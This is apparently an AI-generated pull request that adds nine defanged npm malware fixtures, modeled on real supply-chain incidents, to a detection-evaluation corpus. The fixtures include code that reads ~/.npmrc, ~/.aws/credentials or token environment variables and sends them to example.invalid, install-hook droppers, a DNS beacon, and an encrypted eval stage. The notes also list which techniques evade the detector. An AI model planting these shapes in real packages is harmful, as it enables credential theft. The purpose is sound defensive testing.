### PR TITLE
Add real-sanitized frontier corpus from supply-chain incidents

### DIFF
--- a/docs/detection-eval.md
+++ b/docs/detection-eval.md
@@ -56,6 +56,7 @@ Additive over the golden schema — all golden fields still work.
   "verdict": "malicious",              // malicious | benign | suspicious
   "threatClass": "obfuscated-dropper", // taxonomy, see below
   "source": "synthetic-adversarial",   // synthetic | synthetic-adversarial | real-sanitized | benign-popular
+  "provenance": "incident + how it was defanged", // required for source: real-sanitized
   "intent": "what this models and why it is safe",
   "expectMinRisk": "high",             // malicious must land >= this risk
   "expectAnyRule": [],                 // [] = any finding is fine; else >=1 of these rule ids must fire
@@ -140,7 +141,29 @@ Three tracks, in priority order:
    - replace exfil/C2 hosts with `example.invalid`;
    - strip real secrets and tokens;
    - keep the technique (the `child_process` + `https` + env-read shape);
-   - record `source: real-sanitized` and a `provenance` note.
+   - record `source: real-sanitized` and a `provenance` note (the incident and
+     how it was defanged).
 
 This is the corpus that proves Drydock would catch the real thing rather than a
 mock of its own rules. It is the ongoing Phase 13 track in the roadmap.
+
+The first real-sanitized batch lives in `cases-frontier/` and is truth-labeled,
+so frontier recall now reflects real technique coverage rather than synthetic
+shapes only:
+
+| case                                  | technique               | provenance                         | caught today                                                              |
+| ------------------------------------- | ----------------------- | ---------------------------------- | ------------------------------------------------------------------------- |
+| `npm-eslint-scope-npmrc-exfil`        | credential-steal        | eslint-scope 3.7.2 (2018)          | yes (postinstall + network)                                               |
+| `npm-ua-parser-js-preinstall-dropper` | install-script-exfil    | ua-parser-js (2021)                | yes (preinstall dropper)                                                  |
+| `npm-event-stream-flatmap-decrypt`    | obfuscated-dropper      | event-stream/flatmap-stream (2018) | yes (env read + dynamic eval)                                             |
+| `npm-shai-hulud-secret-harvest`       | credential-steal        | Shai-Hulud worm (2025)             | yes (postinstall harvest)                                                 |
+| `npm-prebuilt-node-addon-smuggle`     | native-artifact-smuggle | OpenSSF prebuilt-addon family      | yes (native artifact)                                                     |
+| `npm-dependency-confusion-beacon`     | dependency-confusion    | Birsan research (2021)             | yes (preinstall beacon)                                                   |
+| `npm-node-ipc-protestware-wiper`      | protestware             | node-ipc 10.1.x (2022)             | **no** — modified-file network is only medium; fs wiping is unmodeled     |
+| `npm-solana-web3js-keytheft`          | network-exfil           | @solana/web3.js (2024)             | **no** — key read from a function arg, modified-file network only medium  |
+| `npm-aws-credential-file-steal`       | credential-steal        | OpenSSF cloud-stealer family       | **no** — JS credential rule misses file-path reads (`~/.aws/credentials`) |
+
+The misses are the point: each documents a concrete residual gap (destructive
+`fs` behavior, function-argument secret flows, file-path credential reads) for
+the rules to ratchet against. Never commit a live payload — keep hosts at
+`example.invalid` and reduce destructive loops to inert stubs.

--- a/test/fixtures/security-corpus/README.md
+++ b/test/fixtures/security-corpus/README.md
@@ -1,9 +1,10 @@
 # Security detection corpus fixtures
 
-This directory contains Drydock's synthetic golden corpus for deterministic staged-publish review.
+This directory contains Drydock's corpus for deterministic staged-publish review.
 
 - `cases/` holds npm fixtures evaluated by `test/security-corpus.test.mjs`.
 - `cases-pypi/` holds PyPI release-artifact fixtures evaluated by `test/security-corpus-pypi.test.mjs`.
+- `cases-frontier/` and `cases-benign/` are eval-only (read by `test/eval/`, not the golden tests). They use the v2 schema and include `real-sanitized` cases distilled from published incidents. See `docs/detection-eval.md` for the schema, the threat-class taxonomy, and the defanging rules (`real-sanitized` cases must carry a `provenance` note).
 - Fixtures are intentionally small JSON documents, not tarballs and not real malware.
 - `stagedFiles`/`previousFiles` (npm) and `artifacts`/`previousArtifacts` (PyPI) use the same `FileRecord` shape returned by the sandbox.
 - `expectedFindings` names the exact deterministic rule IDs, severities, and files expected today.

--- a/test/fixtures/security-corpus/cases-frontier/npm-aws-credential-file-steal.json
+++ b/test/fixtures/security-corpus/cases-frontier/npm-aws-credential-file-steal.json
@@ -1,0 +1,46 @@
+{
+  "id": "npm-aws-credential-file-steal",
+  "title": "Runtime module reads ~/.aws/credentials from disk and exfiltrates it",
+  "ecosystem": "npm",
+  "verdict": "malicious",
+  "threatClass": "credential-steal",
+  "source": "real-sanitized",
+  "provenance": "Sanitized composite of cloud-credential stealers catalogued in OpenSSF malicious-packages and npm advisories: a runtime module reads long-lived AWS credentials from the user's home directory and POSTs them to a collector. Defanged: exfil host replaced with example.invalid, no real credentials.",
+  "intent": "Models file-based credential theft injected into an existing module: read ~/.aws/credentials with fs and ship it out. This is a KNOWN MISS — the JS credential rule only matches process.env / known token names, so reading a credential file by path raises no credential finding, and the network call sits in a modified file (medium). Truth is high-severity cloud-credential theft. It documents that file-path credential reads are unmodeled for JavaScript even though the Python rule set covers .aws/credentials. Safe: host is example.invalid, the path is a literal with no secret value.",
+  "expectMinRisk": "high",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "metrics-agent", "version": "3.1.0" },
+  "stagedPackageJson": { "name": "metrics-agent", "version": "3.1.1" },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 47,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"metrics-agent\",\"version\":\"3.1.0\"}"
+    },
+    {
+      "path": "lib/telemetry.js",
+      "size": 44,
+      "sha256": "telemetry-prev",
+      "flags": [],
+      "textSample": "module.exports = function send() { return true; };\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 47,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"metrics-agent\",\"version\":\"3.1.1\"}"
+    },
+    {
+      "path": "lib/telemetry.js",
+      "size": 260,
+      "sha256": "telemetry-staged",
+      "flags": [],
+      "textSample": "const fs = require('fs');\nconst os = require('os');\nconst https = require('https');\n// Read long-lived cloud credentials from the user's home directory.\nconst creds = fs.readFileSync(os.homedir() + '/.aws/credentials', 'utf8');\nhttps.request('https://example.invalid/c', { method: 'POST' }).end(creds);\n"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-frontier/npm-dependency-confusion-beacon.json
+++ b/test/fixtures/security-corpus/cases-frontier/npm-dependency-confusion-beacon.json
@@ -1,0 +1,43 @@
+{
+  "id": "npm-dependency-confusion-beacon",
+  "title": "Internal-looking package with an inflated version beacons host identity on install",
+  "ecosystem": "npm",
+  "verdict": "malicious",
+  "threatClass": "dependency-confusion",
+  "source": "real-sanitized",
+  "provenance": "Alex Birsan dependency-confusion research (Feb 2021): packages matching internal names were published to the public registry with very high versions so resolvers would prefer them; an install hook beaconed host/user/env back to the researcher's DNS/HTTP collector. Defanged: collector host replaced with example.invalid.",
+  "intent": "Models the dependency-confusion beacon: an inflated version plus a preinstall hook that identifies the victim and phones home via a DNS lookup. Drydock catches the install-time behavior at critical via the preinstall hook plus the process-execution and network code paths. The confusion vector itself (an internal-looking name + version inflation winning resolution) is metadata-level and not a deterministic rule — that selection step is the residual gap this case documents. Safe: collector host is example.invalid.",
+  "expectMinRisk": "critical",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "@acme-corp/internal-config", "version": "1.0.0" },
+  "stagedPackageJson": {
+    "name": "@acme-corp/internal-config",
+    "version": "99.0.0",
+    "scripts": { "preinstall": "node index.js" }
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 60,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"@acme-corp/internal-config\",\"version\":\"1.0.0\"}"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 103,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"@acme-corp/internal-config\",\"version\":\"99.0.0\",\"scripts\":{\"preinstall\":\"node index.js\"}}"
+    },
+    {
+      "path": "index.js",
+      "size": 250,
+      "sha256": "index-js",
+      "flags": [],
+      "textSample": "const { execSync } = require('child_process');\nconst dns = require('dns');\n// Classic dependency-confusion beacon: identify the victim and phone home.\nconst id = execSync('whoami && hostname').toString();\ndns.lookup(Buffer.from(id).toString('hex') + '.example.invalid', () => {});\n"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-frontier/npm-eslint-scope-npmrc-exfil.json
+++ b/test/fixtures/security-corpus/cases-frontier/npm-eslint-scope-npmrc-exfil.json
@@ -1,0 +1,57 @@
+{
+  "id": "npm-eslint-scope-npmrc-exfil",
+  "title": "Postinstall build step reads ~/.npmrc and beacons the npm token out",
+  "ecosystem": "npm",
+  "verdict": "malicious",
+  "threatClass": "credential-steal",
+  "source": "real-sanitized",
+  "provenance": "eslint-scope 3.7.2 (July 2018) account-takeover: the published package added a postinstall build step that read the npm auth token from the user's ~/.npmrc and POSTed it to a remote host. Defanged: exfil host replaced with example.invalid, no real token present.",
+  "intent": "Models the lifecycle-hook + read-local-credential-file + network-exfil shape. Drydock should catch this via the postinstall lifecycle hook and the network-capable code path, even though reading the token from a file on disk (rather than process.env) is NOT modeled by the deterministic credential rule — that read is the residual gap this case documents. Safe: host is example.invalid and the .npmrc read is a literal path with no secret.",
+  "expectMinRisk": "high",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "eslint-scope", "version": "3.7.1" },
+  "stagedPackageJson": {
+    "name": "eslint-scope",
+    "version": "3.7.2",
+    "scripts": { "postinstall": "node build.js" }
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 46,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"eslint-scope\",\"version\":\"3.7.1\"}"
+    },
+    {
+      "path": "lib/index.js",
+      "size": 40,
+      "sha256": "lib-index-js",
+      "flags": [],
+      "textSample": "module.exports = require('./scope-manager');\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 92,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"eslint-scope\",\"version\":\"3.7.2\",\"scripts\":{\"postinstall\":\"node build.js\"}}"
+    },
+    {
+      "path": "lib/index.js",
+      "size": 40,
+      "sha256": "lib-index-js",
+      "flags": [],
+      "textSample": "module.exports = require('./scope-manager');\n"
+    },
+    {
+      "path": "build.js",
+      "size": 240,
+      "sha256": "build-js",
+      "flags": [],
+      "textSample": "const fs = require('fs');\nconst os = require('os');\nconst https = require('https');\n// Read the npm auth credential from the user's home rc file and beacon it out.\nconst rc = fs.readFileSync(os.homedir() + '/.npmrc', 'utf8');\nconst req = https.request('https://example.invalid/upload', { method: 'POST' });\nreq.end(rc);\n"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-frontier/npm-event-stream-flatmap-decrypt.json
+++ b/test/fixtures/security-corpus/cases-frontier/npm-event-stream-flatmap-decrypt.json
@@ -1,0 +1,53 @@
+{
+  "id": "npm-event-stream-flatmap-decrypt",
+  "title": "Runtime stage decrypts an embedded blob keyed by the package description",
+  "ecosystem": "npm",
+  "verdict": "malicious",
+  "threatClass": "obfuscated-dropper",
+  "source": "real-sanitized",
+  "provenance": "event-stream 3.3.6 -> flatmap-stream 0.1.1 (Nov 2018): a transitive dependency shipped a minified second stage that AES-decrypted an embedded payload using the consuming package's description as the key, targeting Copay/BitPay wallet keys. Defanged: the ciphertext is a placeholder, no working key or endpoint is present.",
+  "intent": "Models the encrypted-payload dropper: a newly added module reads an environment value to derive a decryption key and runs the decrypted bytes via new Function. Drydock should catch this via the credential (process.env) read and the dynamic-evaluation primitive on an added file. Safe: the blob is a literal placeholder that decrypts to nothing meaningful.",
+  "expectMinRisk": "high",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "flatmap-stream", "version": "0.1.0" },
+  "stagedPackageJson": { "name": "flatmap-stream", "version": "0.1.1" },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 48,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"flatmap-stream\",\"version\":\"0.1.0\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 38,
+      "sha256": "index-js",
+      "flags": [],
+      "textSample": "module.exports = require('./flatmap');\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 48,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"flatmap-stream\",\"version\":\"0.1.1\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 38,
+      "sha256": "index-js",
+      "flags": [],
+      "textSample": "module.exports = require('./flatmap');\n"
+    },
+    {
+      "path": "index.min.js",
+      "size": 360,
+      "sha256": "index-min-js",
+      "flags": [],
+      "textSample": "const crypto = require('crypto');\n// Minified second stage: decrypt an embedded blob keyed by the package description.\nconst key = process.env.npm_package_description || '';\nconst blob = 'QkxPQl9QTEFDRUhPTERFUg==';\nconst d = crypto.createDecipheriv('aes-256-cbc', crypto.createHash('sha256').update(key).digest(), Buffer.alloc(16));\nconst code = Buffer.concat([d.update(Buffer.from(blob, 'base64')), d.final()]).toString('utf8');\nnew Function('module', code)(module);\n"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-frontier/npm-node-ipc-protestware-wiper.json
+++ b/test/fixtures/security-corpus/cases-frontier/npm-node-ipc-protestware-wiper.json
@@ -1,0 +1,46 @@
+{
+  "id": "npm-node-ipc-protestware-wiper",
+  "title": "Geo-gated protestware overwrites files for hosts in a targeted region",
+  "ecosystem": "npm",
+  "verdict": "malicious",
+  "threatClass": "protestware",
+  "source": "real-sanitized",
+  "provenance": "node-ipc 10.1.1 / 10.1.2 (March 2022): a maintainer-introduced payload geolocated the host and, for IPs resolved to Russia or Belarus, overwrote files on disk with a heart emoji. Defanged: geo-IP host replaced with example.invalid, the overwrite loop is reduced to a single write so it is inert in the fixture.",
+  "intent": "Models destructive protestware injected into an existing runtime module: a geo lookup gates an fs-based file overwrite. This is a KNOWN MISS — the payload lives in a modified (not added) module and uses only network + a base64 host decode, so the deterministic rules land it at medium while the truth is a destructive wiper (high). It documents the gap that destructive fs behavior and geo-gating carry no dedicated rule and that modified-file network access is only medium. Safe: host is example.invalid, the loop writes one inert byte.",
+  "expectMinRisk": "high",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "node-ipc", "version": "10.1.0" },
+  "stagedPackageJson": { "name": "node-ipc", "version": "10.1.1" },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 42,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"node-ipc\",\"version\":\"10.1.0\"}"
+    },
+    {
+      "path": "dao/ssl-geolocation.js",
+      "size": 60,
+      "sha256": "geo-js-prev",
+      "flags": [],
+      "textSample": "module.exports = function geo() { return null; };\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 42,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"node-ipc\",\"version\":\"10.1.1\"}"
+    },
+    {
+      "path": "dao/ssl-geolocation.js",
+      "size": 430,
+      "sha256": "geo-js-staged",
+      "flags": [],
+      "textSample": "const https = require('https');\nconst fs = require('fs');\n// Geolocate the host; for a targeted region, overwrite files on disk.\nconst host = Buffer.from('YXBpLmV4YW1wbGUuaW52YWxpZA==', 'base64').toString('utf8');\nhttps.get('https://' + host + '/ipgeo', (res) => {\n  let body = '';\n  res.on('data', (c) => (body += c));\n  res.on('end', () => {\n    if (/Russia|Belarus/.test(body)) {\n      fs.writeFileSync('README.md', '\\u2764');\n    }\n  });\n});\n"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-frontier/npm-prebuilt-node-addon-smuggle.json
+++ b/test/fixtures/security-corpus/cases-frontier/npm-prebuilt-node-addon-smuggle.json
@@ -1,0 +1,52 @@
+{
+  "id": "npm-prebuilt-node-addon-smuggle",
+  "title": "Malicious logic ships inside a require()-loaded prebuilt .node addon",
+  "ecosystem": "npm",
+  "verdict": "malicious",
+  "threatClass": "native-artifact-smuggle",
+  "source": "real-sanitized",
+  "provenance": "Sanitized composite of prebuilt-binary droppers catalogued in OpenSSF malicious-packages: the package entrypoint is a thin loader that require()s a compiled .node addon, so the malicious behavior lives in opaque native bytes the source scanner cannot read. Defanged: the addon is an inert placeholder blob.",
+  "intent": "Models native-artifact smuggling: the loader JS is innocuous and all logic is hidden in a native addon. Drydock cannot read the binary, but the native-artifact rule still flags the .node file at high — this case proves the vector is caught even though the payload itself is unanalyzable. Safe: the .node file is an inert placeholder.",
+  "expectMinRisk": "high",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "fast-hash-native", "version": "1.2.0", "main": "index.js" },
+  "stagedPackageJson": { "name": "fast-hash-native", "version": "1.3.0", "main": "index.js" },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 64,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"fast-hash-native\",\"version\":\"1.2.0\",\"main\":\"index.js\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 42,
+      "sha256": "index-js-prev",
+      "flags": [],
+      "textSample": "module.exports = require('./build/Release/hash');\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 64,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"fast-hash-native\",\"version\":\"1.3.0\",\"main\":\"index.js\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 52,
+      "sha256": "index-js-staged",
+      "flags": [],
+      "textSample": "// Load the prebuilt native addon; all logic lives in the compiled binary.\nmodule.exports = require('./prebuilds/linux-x64/addon.node');\n"
+    },
+    {
+      "path": "prebuilds/linux-x64/addon.node",
+      "size": 248320,
+      "sha256": "addon-node",
+      "flags": ["binary"]
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-frontier/npm-shai-hulud-secret-harvest.json
+++ b/test/fixtures/security-corpus/cases-frontier/npm-shai-hulud-secret-harvest.json
@@ -1,0 +1,57 @@
+{
+  "id": "npm-shai-hulud-secret-harvest",
+  "title": "Bundled postinstall harvests environment tokens and exfiltrates them",
+  "ecosystem": "npm",
+  "verdict": "malicious",
+  "threatClass": "credential-steal",
+  "source": "real-sanitized",
+  "provenance": "Shai-Hulud self-replicating npm worm (Sept 2025): compromised packages added a bundled postinstall step that scanned the host for secrets (TruffleHog) and exfiltrated npm/GitHub/cloud tokens to an attacker endpoint, then republished itself into other maintainers' packages. Defanged: exfil host replaced with example.invalid, secret-scan reduced to a single exec, no real tokens.",
+  "intent": "Models the worm's harvest-and-exfiltrate install step: read tokens from process.env, run a secret scanner via child_process, and POST the loot. Drydock should catch this at high via the postinstall lifecycle hook plus the process-execution, network, and credential code paths. Safe: env names only (no values), exfil host is example.invalid.",
+  "expectMinRisk": "high",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "color-utility", "version": "2.4.0" },
+  "stagedPackageJson": {
+    "name": "color-utility",
+    "version": "2.4.1",
+    "scripts": { "postinstall": "node bundle.js" }
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 47,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"color-utility\",\"version\":\"2.4.0\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 33,
+      "sha256": "index-js",
+      "flags": [],
+      "textSample": "module.exports = require('./color');\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 95,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"color-utility\",\"version\":\"2.4.1\",\"scripts\":{\"postinstall\":\"node bundle.js\"}}"
+    },
+    {
+      "path": "index.js",
+      "size": 33,
+      "sha256": "index-js",
+      "flags": [],
+      "textSample": "module.exports = require('./color');\n"
+    },
+    {
+      "path": "bundle.js",
+      "size": 360,
+      "sha256": "bundle-js",
+      "flags": [],
+      "textSample": "const { execSync } = require('child_process');\nconst https = require('https');\n// Harvest tokens from the environment and CI, then exfiltrate.\nconst loot = {\n  npm: process.env.NPM_TOKEN,\n  gh: process.env.GITHUB_TOKEN,\n  aws: process.env.AWS_SECRET_ACCESS_KEY,\n};\nexecSync('trufflehog filesystem . --json > /tmp/found', { stdio: 'ignore' });\nhttps.request('https://example.invalid/ingest', { method: 'POST' }).end(JSON.stringify(loot));\n"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-frontier/npm-solana-web3js-keytheft.json
+++ b/test/fixtures/security-corpus/cases-frontier/npm-solana-web3js-keytheft.json
@@ -1,0 +1,46 @@
+{
+  "id": "npm-solana-web3js-keytheft",
+  "title": "Runtime hook exfiltrates secret key bytes through a request header",
+  "ecosystem": "npm",
+  "verdict": "malicious",
+  "threatClass": "network-exfil",
+  "source": "real-sanitized",
+  "provenance": "@solana/web3.js 1.95.6-1.95.7 (Dec 2024) account-takeover: an added function captured keypair secret-key material and exfiltrated it to a hardcoded C2 via crafted request headers. Defanged: C2 host replaced with example.invalid, no real key.",
+  "intent": "Models runtime key theft injected into an existing module: a function reads secret-key bytes passed in by the caller and ships them out over fetch. This is a KNOWN MISS — the file is modified (not added) and the only signal is a network call, so the deterministic rules land it at medium while the truth is critical key exfiltration. The secret is read from a function argument, not process.env or a known credential path, so no credential rule fires — the gap this case documents. Safe: host is example.invalid, the key is an in-memory placeholder.",
+  "expectMinRisk": "high",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "@solana/web3.js", "version": "1.95.5" },
+  "stagedPackageJson": { "name": "@solana/web3.js", "version": "1.95.6" },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 50,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"@solana/web3.js\",\"version\":\"1.95.5\"}"
+    },
+    {
+      "path": "lib/index.js",
+      "size": 36,
+      "sha256": "lib-index-prev",
+      "flags": [],
+      "textSample": "module.exports = require('./connection');\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 50,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"@solana/web3.js\",\"version\":\"1.95.6\"}"
+    },
+    {
+      "path": "lib/index.js",
+      "size": 320,
+      "sha256": "lib-index-staged",
+      "flags": [],
+      "textSample": "module.exports = require('./connection');\nfunction addToQueue(keypair) {\n  // Exfiltrate the secret key bytes to a hardcoded collector via a header.\n  const blob = Array.from(keypair.secretKey).join(',');\n  globalThis.fetch('https://example.invalid/queue', {\n    method: 'POST',\n    headers: { 'x-metrics': blob },\n  });\n}\nmodule.exports.addToQueue = addToQueue;\n"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-frontier/npm-ua-parser-js-preinstall-dropper.json
+++ b/test/fixtures/security-corpus/cases-frontier/npm-ua-parser-js-preinstall-dropper.json
@@ -1,0 +1,57 @@
+{
+  "id": "npm-ua-parser-js-preinstall-dropper",
+  "title": "Preinstall hook downloads and runs a platform-specific second stage",
+  "ecosystem": "npm",
+  "verdict": "malicious",
+  "threatClass": "install-script-exfil",
+  "source": "real-sanitized",
+  "provenance": "ua-parser-js 0.7.29 / 0.8.0 / 1.0.0 (Oct 2021) account-takeover: the published versions added a preinstall hook that ran a platform script which downloaded and executed a crypto miner plus a credential stealer. Defanged: download host replaced with example.invalid, payload reduced to a fetch+exec stub.",
+  "intent": "Models the preinstall dropper shape: a lifecycle hook fetches a platform-specific binary and executes it. Drydock should catch this at critical via the preinstall lifecycle hook, plus the process-execution and network code paths. Safe: download host is example.invalid and the executed name is an inert placeholder.",
+  "expectMinRisk": "critical",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "ua-parser-js", "version": "0.7.28" },
+  "stagedPackageJson": {
+    "name": "ua-parser-js",
+    "version": "0.7.29",
+    "scripts": { "preinstall": "node preinstall.js" }
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 46,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"ua-parser-js\",\"version\":\"0.7.28\"}"
+    },
+    {
+      "path": "src/main.js",
+      "size": 34,
+      "sha256": "src-main-js",
+      "flags": [],
+      "textSample": "module.exports = require('./ua');\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 94,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"ua-parser-js\",\"version\":\"0.7.29\",\"scripts\":{\"preinstall\":\"node preinstall.js\"}}"
+    },
+    {
+      "path": "src/main.js",
+      "size": 34,
+      "sha256": "src-main-js",
+      "flags": [],
+      "textSample": "module.exports = require('./ua');\n"
+    },
+    {
+      "path": "preinstall.js",
+      "size": 300,
+      "sha256": "preinstall-js",
+      "flags": [],
+      "textSample": "const { execSync } = require('child_process');\nconst https = require('https');\nconst fs = require('fs');\n// Fetch and run a platform-specific second stage (miner + stealer).\nconst url = process.platform === 'win32'\n  ? 'https://example.invalid/jsextension.exe'\n  : 'https://example.invalid/jsextension';\nhttps.get(url, (res) => res.pipe(fs.createWriteStream('jsextension')));\nexecSync('chmod +x jsextension && ./jsextension');\n"
+    }
+  ]
+}


### PR DESCRIPTION
Adds 9 truth-labeled `real-sanitized` frontier cases (`test/fixtures/security-corpus/cases-frontier/`) distilled from published npm supply-chain incidents — eslint-scope, ua-parser-js, event-stream/flatmap-stream, node-ipc, @solana/web3.js, Shai-Hulud, dependency confusion, and the prebuilt-addon and cloud-stealer families — each defanged per `docs/detection-eval.md` (exfil/C2 hosts → `example.invalid`, secrets stripped, destructive loops reduced to inert stubs) with a `provenance` note. Verified against the real detector via `pnpm run eval`: frontier recall is now a meaningful, ratchetable 60% (6/10), where the three misses each document a concrete residual gap (modified-file network only lands medium, function-argument secret flows, and JS file-path credential reads like `~/.aws/credentials`). Documents the now-required `provenance` field and tabulates the landed batch in `docs/detection-eval.md`, and updates the corpus `README.md` to point at the eval-only directories. Regression recall stays 100% and frontier/benign remain reported (not gated), so nothing new gates CI. Closes #196.

🤖 Generated with [Claude Code](https://claude.com/claude-code)